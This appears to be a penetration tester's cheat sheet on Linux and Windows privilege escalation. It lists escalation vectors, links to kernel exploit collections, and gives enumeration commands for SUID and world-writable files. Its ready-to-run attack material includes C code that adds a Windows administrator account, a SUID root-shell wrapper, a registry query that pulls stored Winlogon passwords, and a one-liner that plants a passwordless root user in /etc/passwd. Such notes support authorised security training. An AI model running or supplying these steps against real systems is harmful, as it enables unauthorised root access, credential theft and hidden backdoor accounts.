Priv Escalation

Privilege Escalation

GTFOBinsgtfobins.github.io

Linux elevation of privilegesguif.re

Windows elevation of privilegesguif.re

FuzzySecurity | Windows Privilege Escalation Fundamentalswww.fuzzysecurity.com

https://payatu.com/guide-linux-privilege-escalation

Linux Privilege Escalation

sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000-default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (Pre-Invoke)
Capabilities

Windows Privilege Escalation

Kernel Exploits
OS Exploits
Pass The Hash
Password reuse
DLL hijacking (Path)
Vulnerable services
Writable services binaries path
Unquoted services
Listening ports on localhost
Registry keys

Kernel Exploits

Linux: https://github.com/lucyoa/kernel-exploits

Windows: https://github.com/abatchy17/WindowsExploits

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
http://www.fuzzysecurity.com/tutorials/16.html

Windows Add User

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main ()
{
  int i;
  i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
  return 0;
}

SUID Change

SUID

Set owner user ID.

int main(void){
  setresuid(0, 0, 0);
  system("/bin/bash");
}

Privilege Escalation:
#Find Binaries that will execute as the owner
find / -perm -u=s -type f 2>/dev/null

#Find binaries that will execute as the group
find / -perm -g=s -type f 2>/dev/null

#Find sticky-bit binaries
find / -perm -1000 -type d 2>/dev/null

find / -perm -4000 2>/dev/null

writable by everyone
find / -writable -type f 2>/dev/null

World writeable directories
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root

World writeable files
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

Writeable config files
find /etc/ -writable -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null

Window Exploit Suggester

python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls

Windows Priv Escalation

AlwaysInstallElevated
Check if the following registry settings are set to "1"
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Basic Linux Enumeration

Distribution type & kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux

Default writeable directory / folder
/tmp
/dev/shm

Search for passwords
Search for password within config.php
grep -R 'password' config.php

Find possible other writeable directory / folder
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

Service(s) running as root user
ps aux | grep root
ps -ef | grep root

Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archivesO
ls -lah /var/cache/yum/

Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab

Find pattern in file:
grep -rnw '/etc/passwd' -e 'root'

Sticky bit, SGID, SUID, GUID
Sticky bit
find / -perm -1000 -type d 2>/dev/null

SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null

SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null

SUID or GUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

Add user to /etc/passwd and root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd

PreviousTransfer files on linux NextLinux Priv Escalation

Last updated 5 years ago

Was this helpful?